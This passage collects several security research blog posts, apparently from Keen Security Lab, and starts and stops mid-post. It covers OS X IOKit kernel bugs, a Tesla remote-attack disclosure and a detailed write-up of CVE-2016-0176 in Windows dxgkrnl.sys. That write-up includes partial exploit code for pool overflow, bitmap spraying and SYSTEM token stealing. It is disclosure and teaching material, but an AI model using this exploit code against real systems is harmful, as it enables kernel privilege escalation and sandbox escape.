ool_size,//ool_input_size                      buf,//inb_output                      (mach_msg_type_number_t*)&outputcnt, //inb_output_size*                      (uint64_t*)buf,//output                      &outputcnt, //outputCnt                      reinterpret_cast_mach_vm_address_t(buf), //ool_output                      (mach_msg_type_number_t*)&outputcnt64//ool_output_size*                      );    }

Two key constans are 4088 and 0xaa, this two numbers will comfort the check at

 inputdatalen - 8 == 3                         * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )

and

   if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL                                                                       * (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen                                                                                           - 8) >> 64) >> 4) )

Panic Report

panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers:CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80R8:  0x00000000ffffffff, R9:  0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fffR12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aaRFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS:  0x0000000000000008, SS:  0x0000000000000010Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0Backtrace (CPU 0), Frame : Return Address0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe20xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe30xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x190xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e70xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd00xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x1030xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb80xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc50xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16      Kernel Extensions in backtrace:         com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff            dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000            dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000         com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff            dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000            dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000            dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000            dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000BSD process name corresponding to current thread: cmdqueue1Boot args: keepsyms=1 -vMac OS version:15F34Kernel version:Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6Kernel slide:     0x000000001dc00000Kernel text base: 0xffffff801de00000__HIB  text base: 0xffffff801dd00000System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)

Disassembling the RIP register

__text:000000000002929E                 mov     esi, [rbx-10h]  ; unsigned int__text:00000000000292A1                 mov     edx, [rbx-0Ch]  ; unsigned int__text:00000000000292A4                 mov     rcx, [rbx-8]    ; unsigned __int64__text:00000000000292A8                 mov     r8, [rbx]       ; unsigned __int64

We can see at the crash address, rbx has already go out-of-bound, hits an adjacent unmapped area, lead to crash.

Tested on 10.11.5 Macbook Airs, Macbook Pros with command line

while true; do ./cmdqueue1 ; done

Fix for these issues

The sources for XNU in 10.11.2 haven’t been released, but let’s have a look at disassembled kernel.

Originally, we have these lines when creating a descriptor:

3741     if (ool_input)3742    inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,3743                            kIODirectionOut, current_task());

Proved by dissembling unpatched kernel:

mov     rax, gs:8mov     rcx, [rax+308h] ; unsigned intmov     edx, 2          ; unsigned __int64mov     rsi, [rbp+arg_8] ; unsigned __int64call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)mov     r15, rax

While on the 10.11.2, the corresponding snippet in _is_io_connect_method changed to:

mov     rax, gs:8mov     rcx, [rax+318h] ; unsigned intmov     edx, 20002h     ; unsigned __int64mov     rsi, [rbp+arg_8] ; unsigned __int64call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)mov     r15, rax

A new flag (0x20000) is introduced to IOMemoryDescriptor::withAddressRange. The flag is later checked in IOGeneralMemoryDescriptor::memoryReferenceCreate, as shown in a diaphora diff on IOMemoryDescriptor’s functions.

  if ( this->_task && !err && this->baseclass_0._flags & 0x20000 && !(optionsa & 4) ) //newly added source    err = IOGeneralMemoryDescriptor::memoryReferenceCreate(this, optionsa | 4, &ref->mapRef);

And is then checked at the beginning of this function

  prot = 1;  cacheMode = (this->baseclass_0._flags & 0x70000000) >> 28;  v4 = vmProtForCacheMode(cacheMode);  prot |= v4;  if ( cacheMode )    prot |= 2u;  if ( 2 != (this->baseclass_0._flags & 3) )    prot |= 2u;  if ( optionsa & 2 )    prot |= 2u;  if ( optionsa & 4 )    prot |= 0x200000u;

prot is used at in mach_make_memory_entry_64, describing the permission of this mapping. 0x200000 is actually MAP_MEM_VM_COPY

382 /* leave room for vm_prot bits */383 #define MAP_MEM_ONLY        0x010000 /* change processor caching  */384 #define MAP_MEM_NAMED_CREATE    0x020000 /* create extant object      */385 #define MAP_MEM_PURGABLE    0x040000 /* create a purgable VM object */386 #define MAP_MEM_NAMED_REUSE 0x080000 /* reuse provided entry if identical */387 #define MAP_MEM_USE_DATA_ADDR   0x100000 /* preserve address of data, rather than base of page */388 #define MAP_MEM_VM_COPY     0x200000 /* make a copy of a VM range */389 #define MAP_MEM_VM_SHARE    0x400000 /* extract a VM range for remap */390 #define MAP_MEM_4K_DATA_ADDR    0x800000 /* preserve 4K aligned address of data */391

Which means now descriptors passed in via IOKit has a memory entry of possibly COW, preventing userspace from modifying it in 10.12.2 and iOS 10.2. Rather than fixing driver issues one by one, Apple seems to have done a good job by patching the entry.

Credits

Credit also goes to Liang Chen of KeenLab for also contributing to this research. Also kudos to Apple security team for responding and fixing these issues.

A Link to System Privilege

2016-11-18T07:29:39.000Z

A Detailed Description of CVE-2016-0176 and Its Exploitation

Essentials of a Successful Pwn of Microsoft Edge

A successful Pwn of Microsoft Edge consists of two essential parts: Browser RCE(Remote Code Execution) and browser sandbox bypass. Browser RCE is typically achieved by exploiting a Javascript vulnerability, while browser sandbox bypass can be achieved in different ways, logical sandbox escape or EoP(Escalation of Privilege) through kernel vulnerabilities.

Sandbox of Microsoft Edge is built upon the access check mechanism. In Windows operating system, resources are shared in system-wide range, for example, a file or device can be shared across different processes. Some resources contain sensitive informations, some others are critical to the whole system’s well-functioning, corruptions of those resources will crash the whole system. For those reasons, there should be strict checks when a process want to access a specific resource, this is called access check. When a resource is opened, token of the subject process will be checked against security descriptor of the object resource. Access check consists of several elementary checks in different dimensions, such as ownership and group membership check, privileges check, integrity level and trust level check, capabilities check, etc. The previous generation sandbox is based on integrity level check, where the sandboxed application runs in low integrity level, thus it can not access resources protected by medium or higher integrity level. Microsoft Edge adopts new generation sandbox based on AppContainer, where additional capabilities check will be conducted when accessing resources, besides basic integrity level check. For more details about access check mechanism, refer to my talk at ZeroNights 2015: Did You Get Your Token?

The most common approach of a sandbox bypass is EoP though kernel vulnerabilities, with DKOM(Direct Kernel Object Manipulation) on token objects.

CVE-2016-0176

This vulnerability is in dxgkrnl.sys driver, and it is a heap overflow vulnerability.

The data structure that has been abused is shown as below:

typedef struct _D3DKMT_PRESENTHISTORYTOKEN
{
    D3DKMT_PRESENT_MODEL  Model; //D3DKMT_PM_REDIRECTED_FLIP      = 2,
    UINT                  TokenSize; // 0x438
    UINT64                CompositionBindingId;

    union
    {
        D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN        Flip;
        D3DKMT_BLTMODEL_PRESENTHISTORYTOKEN         Blt;
        D3DKMT_VISTABLTMODEL_PRESENTHISTORYTOKEN    VistaBlt;
        D3DKMT_GDIMODEL_PRESENTHISTORYTOKEN         Gdi;
        D3DKMT_FENCE_PRESENTHISTORYTOKEN            Fence;
        D3DKMT_GDIMODEL_SYSMEM_PRESENTHISTORYTOKEN  GdiSysMem;
        D3DKMT_COMPOSITION_PRESENTHISTORYTOKEN      Composition;
    }
    Token;
} D3DKMT_PRESENTHISTORYTOKEN;

I will use “history token” as alias of this structure, there are some prerequisites for this vulnerability in this structure:

Model member should be set to D3DKMT_PM_REDIRECTED_FLIP;
TokenSize member should be set to 0x438;

You may already guessed that the vulnerability is in the Token.Flip member, whose type is shown as below:

typedef struct _D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN
{
    UINT64                                     FenceValue;
    ULONG64                                    hLogicalSurface;
    UINT_PTR                                   dxgContext;
    D3DDDI_VIDEO_PRESENT_SOURCE_ID             VidPnSourceId;

    ……
 
    D3DKMT_DIRTYREGIONS                        DirtyRegions;
} D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN;

Keep diving into the last member DirtyRegions:

typedef struct tagRECT
{
    LONG    left;
    LONG    top;
    LONG    right;
    LONG    bottom;
} RECT, *PRECT, NEAR *NPRECT, FAR *LPRECT; // 0x10 bytes

typedef struct _D3DKMT_DIRTYREGIONS
{
    UINT  NumRects;

    RECT  Rects[D3DKMT_MAX_PRESENT_HISTORY_RECTS]; // 0x10 * 0x10 = 0x100 bytes

     //#define D3DKMT_MAX_PRESENT_HISTORY_RECTS 16

} D3DKMT_DIRTYREGIONS;

Now we reach to the primitive level, there is a DWORD member NumRects, and an array of RECT structures as Rects, this array is fixed-sized to 16 elements, each element is 0x10 bytes, so the size of Rects is 0x100 bytes.

This graph above shows the relationship and layout of abused data structures, the left column is the data structure that we prepared in user-mode and passed to kernel-mode drivers by calling Win32 API D3DKMTPresent, the middle column is the data structure that dxgkrnl.sys driver received and maintained, it is copied out from the user-mode buffer, the right column is the embedded union member Token.Flip, a very important feature of this union member is that it is the largest member in the union, we know that the size of a union is determined by its largest member, so the content of Token.Flip stretches to the end of the history token structure. This layout simplifies the exploitation to a large extent.

With the knowledge of the abused data structures, it will be easy to understand the vulnerability, below is the disassembly code snippet that cause the overflow:

loc_1C009832A: DXGCONTEXT::SubmitPresentHistoryToken(......) + 0x67B        cmp     dword ptr[r15 + 334h], 10h // NumRects        jbe     short loc_1C009834B; Jump if Below or Equal(CF = 1 | ZF = 1)        call    cs : __imp_WdLogNewEntry5_WdAssertion        mov     rcx, rax        mov     qword ptr[rax + 18h], 38h        call    cs : __imp_WdLogEvent5_WdAssertionloc_1C009834B: DXGCONTEXT::SubmitPresentHistoryToken (......) + 0x6B2        mov     eax, [r15 + 334h]        shl     eax, 4        add     eax, 338h        jmp     short loc_1C00983BDloc_1C00983BD: DXGCONTEXT::SubmitPresentHistoryToken (......) + 0x6A5        lea     r8d, [rax + 7]        mov     rdx, r15; Src        mov     eax, 0FFFFFFF8h;        mov     rcx, rsi; Dst        and     r8, rax; Size        call    memmove

The r15 register is pointing to the buffer of history token at the entry of this piece of code. It first picks out the DWORD at 0x334 offset and compare it with 0x10, we already know that this DWORD is the Token.Flip.NumRects field, so it is checking if this field exceeds the capacity of the embedded array Token.Flip.Rects. If you are doing code auditing, and you see this check, you may feel frustrated and soliloquize that Microsoft already realized the potential problem here and done some check. But when you move forward, you will see after this check the code logs this abnormal behavior to the watch dog driver with assertion logic, and either branches initiated from this comparison will flow into the same code block at loc_1C009834B. Then you may think that the watch dog driver will invoke the bug check logic in case of overflow, but nothing happened actually. No matter what the value is in Token.Flip.NumRects field, the code flow will reach the block at loc_1C009834B, this block first does some arithmatic calculation based on the Token.Flip.NumRects field and then use it as the size of a memcpy operation.

I rewrite this piece of disassembly code to C++ code as below:

D3DKMT_PRESENTHISTORYTOKEN* hist_token_src = BufferPassedFromUserMode(…);
D3DKMT_PRESENTHISTORYTOKEN* hist_token_dst = ExpInterlockedPopEntrySList(…);

if(hist_token_src->dirty_regions.NumRects > 0x10)
{
    // log via watch dog assertion, NOT work in free/release build
}

auto size = (hist_token_src->dirty_regions.NumRects * 0x10 + 0x338 + 7) / 8;
auto src = (uint8_t*)hist_token_src;
auto dst = (uint8_t*)hist_token_dst;
memcpy(dst, src, size);

Things become clear in C++ codes, no matter what the Token.Flip.NumRects is, dxgkrnl.sys driver will do a memcpy operation, the source buffer of this memcpy is the buffer we passed from user-mode by calling Win32 API D3DKMTPresent function, the destination of this memcpy is a piece of buffer allocated from kernel-mode pool by ExpInterlockedPopEntrySList, the size of this memcpy is calculated by adding the array size of Token.Flip.NumRects elements with the buffer size before this array. If we pass a value larger than 0x10 in Token.Flip.NumRects field in the user-mode buffer, then an overflow to kernel-mode paged pool will occur, we can control the size of the overflow, as well as the first 0x38 bytes content of this overflow. (0x38 more bytes can be set after the end of history token, check the layout graph for more details.)

This vulnerability is interesting, because Microsoft already foresee it but fail to prevent it. The lesson is do not fully trust some best practices unless you know it very well, such as assertion mechanism.

Exploitation

For exploitation of a heap overflow, the layout of the destination buffer is very important. We already know that the destination buffer is allocated from kernel-mode paged pool with ExpInterlockedPopEntrySList function.

With a little debugging work, we can get some basic information about the destination buffer.

kd> u rip-6 L2dxgkrnl!DXGCONTEXT::SubmitPresentHistoryToken+0x47b:fffff801`cedb80fb call    qword ptr [dxgkrnl!_imp_ExpInterlockedPopEntrySList (fffff801`ced77338)]fffff801`cedb8101 test    rax,raxkd> !pool raxPool page ffffc0012764c5a0 region is Paged pool*ffffc0012764b000 : large page allocation, tag is DxgK, size is 0x2290 bytes    Pooltag DxgK : Vista display driver support, Binary : dxgkrnl.sys

It is a large buffer in 0x2290 bytes, as its size is larger than 1 page(a page is 0x1000 bytes), it will be allocated as large page allocation. In this case, 3 continuous pages will be consumed to serve this allocation request. The extra bytes after 0x2290 offset will be reclaimed and linked back to free list of paged pool, while an extra separating pool entry tagged as “Frag” will be added between them. For more information about Windows kernel pool layout and large page allocation, please refer to Kernel Pool Exploitation on Windows 7. Below is how it looks at the 0x2290 offset:

kd> db ffffc0012764b000+0x2290 L40ffffc001`2764d290  00 01 02 03 46 72 61 67-00 00 00 00 00 00 00 00  ....Frag........ffffc001`2764d2a0  90 22 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ."..............ffffc001`2764d2b0  02 01 01 00 46 72 65 65-0b 43 44 9e f1 81 a8 47  ....Free.CD....Gffffc001`2764d2c0  01 01 04 03 4e 74 46 73-c0 32 42 3a 00 e0 ff ff  ....NtFs.2B:....

It is DXGPRESENTHISTORYTOKENQUEUE::GrowPresentHistoryBuffer who is responsible for allocating and managing history tokens as a singly-linked list. Each history token is 0x438 bytes in size, and extend to 0x450 bytes by counting pool header and padding bytes in; The large page allocation is divided into 8 history tokens, linked in reverse order to form the singly-linked list. Dxgkrnl.sys driver intends to use this slist as look-aside list for serving the allocation requests of history token.

This singly-linked list looks as below initially:

The singly-linked list looks as below after serving 1 history token allocation request:

The singly-linked list looks as below after serving 2 history token allocation request:

With knowledge of the memory layout of destination buffer of the heap overflow, we have 2 ideas about exploitation:

Idea 1. Overflow the buffer after 0x2290 offset, where maybe reused by some small allocations from paged pool:

Idea 2. Overflow the adjacent history token’s header, which may abuse the singly-linked list:

The first exploitation idea has some limitations, recall that we can control only 0x38 bytes of the overflowed content, it means we can almost control nothing but the padding bytes, separating frag pool entry and the following pool entry’s header.

The second exploitation idea seems promising, although now Windows kernel is enforcing strict validation for doubly-linked list, but no checks for singly-linked list, we can play the redirecting tricks for singly-linked list.

Let’s do some thought experiments just like Einstein for idea 2. In the above graphs, we see that after poping 2 history tokens out of the slist, we can overflow node B and overwriting the header of node A. Then we push node B back to the slist:

What happens after we push node A back to the slist, will it redirect next pointer to the overwritten QWORD?

Actually this will never happen, because while we pushing node A back to slist, the overwritten QWORD in node A’s header will be recovered to pointing to node B:

Then we try another possibility, first get back to where after poping 2 nodes out of slist:

This time we first push node A back to slist:

Then we overflow node B to overwrite node A’s header, because now node A already be reclaimed to slist, and its header will not be recovered any more. Now the slist is broken and redirected to the overwritten QWORD:

After this series of thought experiments, it is more promising for exploitation in idea 2, let’s get our hands dirty. It seems that we need to pop and push the slist in random order to trigger the above redirection, at least 2 continuous pops side by side. I did the following tries:

1st Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer.

This time I failed, it turns out looping poping node A out and pushing node A back again, in this case I can only overflow as idea 1. The reason is simple, those D3DKMTPresent API calls are served in turns, so we need to call it simultaneously.

2nd Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer from multiple threads.

This time I failed again, after checking some disassembly codes, I believe
the callstack of D3DKMTPresent is protected by a lock.

After those 2 tries, I start to doubt if the 2 continuous pops are doable, I abandoned this doubt quickly after realizing the complex slist should not be degenerated to 1 element, there should be other callstacks triggering pop of the slist. I wrote a windbg script for logging push and pop operations, and tried launching some graphics intensive applications while doing 2nd try. Then miracle happened, while I playing with the built-in Solitaire games, a double pop happened, I debugged and found out a BitBlt API will trigger poping elements out of the slist from another callstack.

3rd and Last Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer from multiple threads, while loop calling BitBlt from another multiple threads.

It succeeded in redirecting the next pointer in slist, and lead to arbitrary write to kernel-mode memory. But it is still far from perfect, we need to find out the tokens of current and system process, and do token stealing. During this process, more than 1 reads and writes are needed, but the tricks above is not easily repeatable, especially with the strict rules of Pwn2Own 2016 that only 3 tries within 15 minutes, some more tricks is needed.

Some More Tricks

Repeatable arbitrary read and write into kernel-mode memory

I used Win32k bitmap object as intermediate targets, I did it by first spraying lots of bitmap objects into kernel-mode memory, and then guessing their addresses as targets of the redirection write. If I succeeded in hitting one of those bitmap objects, I modify the buffer pointer and size field in it, make it pointing to another bitmap object. So 2 bitmap objects in use, first for controlling the address of read and write, second for doing actual read and write.

Actually I sprayed bitmap objects into 4GB range of memory, I first sprayed 256MB large bitmap objects to reserve continuous and well-aligned pool memory, then I replace them with 1MB small bitmap objects whose address is aligned at 0x100000 boundary, which makes guessing much easier.

Information leakage is needed as a hint for guessing the addresses of sprayed bitmap objects, this is done with the help of user32! gSharedInfo.

Token Stealing

With the ability of repeatably arbitrary read and write, as well as information leakage of nt kernel module base address by sidt, we can easily find the address of nt!PspCidTable, then we can find the _EPROCESS object of current and system process by parsing this table, and get the respective _TOKEN object addresses and finally do the token stealing.

Exploitation Code(parts)

VOID ThPresent(THREAD_HOST * th)
{
    SIZE_T hint = 0;
    while (TRUE)
    {
        HIST_TOKEN ht = { 0, };
        HtInitialize(&ht);

        SIZE_T victim_surf_obj = ThNextGuessedAddr(th, ++hint);

        SIZE_T buffer_ptr = victim_surf_obj + 0x200000 + 0x18;
        th->backupBufferPtr1 = victim_surf_obj + 0x258;
        th->backupBufferPtr2 = victim_surf_obj + 0x200000 + 0x258;

        SIZE_T back_offset = 0x10;

        SURFOBJ surf_obj = { 0, };

        surf_obj.cjBits = 0x80;
        surf_obj.pvBits = (PVOID)buffer_ptr;
        surf_obj.pvScan0 = (PVOID)buffer_ptr;
        surf_obj.sizlBitmap.cx = 0x04;
        surf_obj.sizlBitmap.cy = 0x08;
        surf_obj.iBitmapFormat = 0x06;
        surf_obj.iType = 0;
        surf_obj.fjBitmap = 0x01;
        surf_obj.lDelta = 0x10;

        DWORD dwBuff = 0x04800200;
        HtSetBuffer(&ht, 0x18 + th->memberOffset - back_offset, (unsigned char*)&surf_obj, 0x68);
        HtSetBuffer(&ht, 0x70 + th->memberOffset - back_offset, &dwBuff, sizeof(DWORD));


        if (th->memberOffset - back_offset + 0xE8 < 0x448)
        {
            SIZE_T qwBuff = victim_surf_obj + 0xE0;
            HtSetBuffer(&ht, 0xE0 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
            HtSetBuffer(&ht, 0xE8 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
        }


        if (th->memberOffset - back_offset + 0x1C0 < 0x448)
        {
            SIZE_T qwBuff = victim_surf_obj + 0x1B8;
            HtSetBuffer(&ht, 0x1B8 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
            HtSetBuffer(&ht, 0x1C0 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
        }

        HtOverflowNextSListEntry(&ht, victim_surf_obj);
        HtTrigger(&ht);

        if (th->triggered)
            break;
    }
}

VOID ThTrigger(THREAD_HOST * th)
{
    SIZE_T i = 0;
    HANDLE threads[TH_MAX_THREADS] = { 0, };
    unsigned char second_buffer[0x78] = { 0, };

    for (SIZE_T i = 0; i < TH_MAX_THREADS; i++)
    {
        if (th->triggered)
        {
            break;
        }

        if (i == 9)
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, ProbeThreadProc, th, 0, &thread_id);
        }
        else if (i % 3 != 0 && i > 0x10)
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, PresentThreadProc, th, 0, &thread_id);
        }           
        else
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, BitbltThreadProc, th, 0, &thread_id);
        }
    }

    for (i = 0; i < TH_MAX_THREADS; i++)
    {
        if (threads[i] != NULL)
        {
            if (WAIT_OBJECT_0 == WaitForSingleObject(threads[i], INFINITE))
            {
                CloseHandle(threads[i]);
                threads[i] = NULL;
            }
        }
    }

    Log("trigged\n");

    ThRead(th, (const void*)th->backupBufferPtr2, second_buffer, 0x78);

    ADDR_RESOLVER ar = { 0, };
    ArInitialize(&ar, th);

    SIZE_T nt_addr = ArNTBase(&ar); 
    SIZE_T psp_cid_table_addr = nt_addr + PSP_CIDTABLE_OFFSET;
    SIZE_T psp_cid_table_value;

    ThRead(th, psp_cid_table_addr, &psp_cid_table_value, 0x08);

    SIZE_T psp_cid_table[0x0C] = { 0, };
    ThRead(th, psp_cid_table_value, psp_cid_table, 0x60);

    SIZE_T table_code = psp_cid_table[1];
    SIZE_T handle_count = psp_cid_table[0x0B] & 0x00000000ffffffff;

    SIZE_T curr_pid = GetCurrentProcessId();

    do
    {
        ThParseCidTable(th, table_code, handle_count);
        Sleep(1000);
    } while (th->currentEprocess == NULL || th->systemEprocess == NULL);

    SIZE_T curr_proc = th->currentEprocess;
    SIZE_T system_proc = th->systemEprocess;

    SIZE_T system_token = 0;
    ThRead(th, (system_proc + 0x358), &system_token, 0x08);

    SIZE_T curr_token = 0;
    ThRead(th, (curr_proc + 0x358), &curr_token, 0x08);

    ThWrite(th, (curr_proc + 0x358), &system_token, 0x08);

    ThRead(th, (curr_proc + 0x358), &curr_token, 0x08);
    
    ThRestore(th);

    Log("elevated\n");

    Sleep(3600000);

    return;
}

References:

Car Hacking Research: Remote Attack Tesla Motors

2016-09-19T15:26:19.000Z

With several months of in-depth research on Tesla Cars, we have discovered multiple security vulnerabilities and successfully implemented remote, aka none physical contact, control on Tesla Model S in both Parking and Driving Mode. It is worth to note that we used an unmodified car with latest firmware to demonstrate the attack.

Following the global industry practice on “responsible disclosure” of product security vulnerabilities, we have reported the technical details of all the vulnerabilities discovered in the research to Tesla. The vulnerabilities have been confirmed by Tesla Product Security Team.

Keen Security Lab appreciates the proactive attitude and efforts of Tesla Security Team, leading by Chris Evans, on responding our vulnerability report and taking actions to fix the issues efficiently. Keen Security Lab is coordinating with Tesla on issue fixing to ensure the driving safety of Tesla users.

As far as we know, this is the first case of remote attack which compromises CAN Bus to achieve remote controls on Tesla cars. We have verified the attack vector on multiple varieties of Tesla Model S. It is reasonable to assume that other Tesla models are affected. Keen Security Lab would like to send out this reminder to all Tesla car owners:

PLEASE DO UPDATE THE FIRMWARE OF YOUR TESLA CAR TO THE LATEST VERSION TO ENSURE THAT THE ISSUES ARE FIXED AND AVOID POTENTIAL DRIVING SAFETY RISKS.

The video below demonstrates the impact of our remote attack vector. REMINDER: WHAT YOU ARE ABOUT TO SEE IN THIS VIDEO ARE PERFORMED BY PROFESSIONAL RESEARCHERS, DO NOT TRY THIS AT HOME.

The Journey of a complete OSX privilege escalation with a single vulnerability - Part 1

2016-07-29T14:12:41.000Z

In previous blog posts Liang talked about the userspace privilege escalation vulnerability we found in WindowServer. Now in following articles I will talk about the Blitzard kernel bug we used in this year’s pwn2own to escape the Safari renderer sandbox, existing in the blit operation of graphics pipeline. From a exploiter’s prospective we took advantage of an vector out-of-bound access which under carefully prepared memory situations will lead to write-anywhere-but-value-restricted to achieve both infoleak and RIP control. In this article we will introduce the exploitation methods we played with mainly in kalloc.48 and kalloc.4096.

First we will first introduce the very function which the overflow occurs, what we can control and how these affect our following exploitation.

The IGVector add function

char __fastcall IGVector::add(IGVector *this, rect_pair_t *a2)
{
  v3 =;
  if ( this->currentSize != this->capacity )
    goto LABEL_4;
  LOBYTE(v4) = IGVector::grow(this, 2 * v3);
  if ( v4 )
  
LABEL_4:
    this->currentSize += 1;
    v5 =;
    *(this->storage +  32 * this->currentSize + 24) = a2->field_18; //rect2.len height 
    *(this->storage +  32 * this->currentSize + 16) = a2->field_10; //rect2.y x
    *(this->storage +  32 * this->currentSize + 8) = a2->field_8; //rect1.len height
    *(this->storage +  32 * this->currentSize) = a2->field_0;  //rect1.y x
  }
  return v4;

IGVector is a generic template collection class used frequently in Apple Graphics drivers. On the head of it lies the currentSize field. Right following the size we have a capacity denoting the current volume of the vector. storage pointer goes after capacity field, recording the actual location of heap objects.
rect_pair_t holds a pair of rectangles, each rectangle corresponds to a drawing section on screen. The fields of rect is listed as follows:

int16 x
int16 y
int16 w
int16 h

x,y denote the coordinate of rect’s corner on screen, while w,h denote the width and height of rectangle. The four fields uniquely locates a rectangle on screen. The initial arguments of rectangle is passed in via integer format, however after a series of multiplication and division they become an IEEE.754 floating number in memory, which makes Hex-rays suffer a lot because it can hardly deal with SSE floating point instructions :(

When the overflow occurs, the memory layout is shown as the following figure.

As the figure shows, the add function is called on a partially out-of-bound 48-size block. The size field is fixed to 0xdeadbeefdeadbeef, because kalloc.48 is smaller than cache-line size, thus it will always be poisoned after freed. Good news is both capacity and storage pointer is under our control. This means we have a write-anywhere primitive covering the whole address space, by carefully preparing content satisfying the following equation, let

then

and also

However we have a write-anywhere but it’s not a write-anything primitive. The rectangles initially have their fields in signed int16 format, falling in range [-0x8000, 0x7fff]. As the function is called, they have already been transformed to IEEE.754 representation in memory, which implies we can only use it to write two continously 4-byte value in range [0x3…, 0x4…., 0xc…, 0xd…, 0xbf800000] (0xbf800000 is float representation of -1) four times, corrupting 32 bytes of memory.

Control the kalloc.48 zone

We need to precisely prepare controlled value right after the overflowed vector, otherwise the kernel will crash on a bad access. Unfortunately kalloc.48 is a zone used frequently in kernel with IOMachPort acting as the most commonly seen object and we must get rid of it. Previous work mainly comes up with io_open_service_extended and ool_msg to prepare the kernel heap. But problem arises for our situation:

ool_msg has small heap side-effect, but the head 0x18 bytes is not controllable while we need precise 8 bytes control at head 0x8 position
io_open_service_extended has massive side effect in kalloc.48 zone by producing an IOMachPort in every opened spraying connection
in each io_open_service_extended call at most 37 items can be passed in kernel to occupy some space, which is constrained by the maximum properties count per IOServiceConnection can hold

Thus we’re presenting a new spray technique: IOCatalogueSendData shown in following code snippet. Only one master_port is needed for continuously spraying, really energy-saving and earth friendly :)

IOCatalogueSendData(
        mach_port_t     _masterPort,
        uint32_t                flag,
        const char             *buffer,
        uint32_t                size )
{
//...

    kr = io_catalog_send_data( masterPort, flag,
                            (char *) buffer, size, &result );
//...
    if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
    mach_port_deallocate(mach_task_self(), masterPort);
//...
}

/* Routine io_catalog_send_data */
kern_return_t is_io_catalog_send_data(
        mach_port_t     master_port,
        uint32_t                flag,
        io_buf_ptr_t        inData,
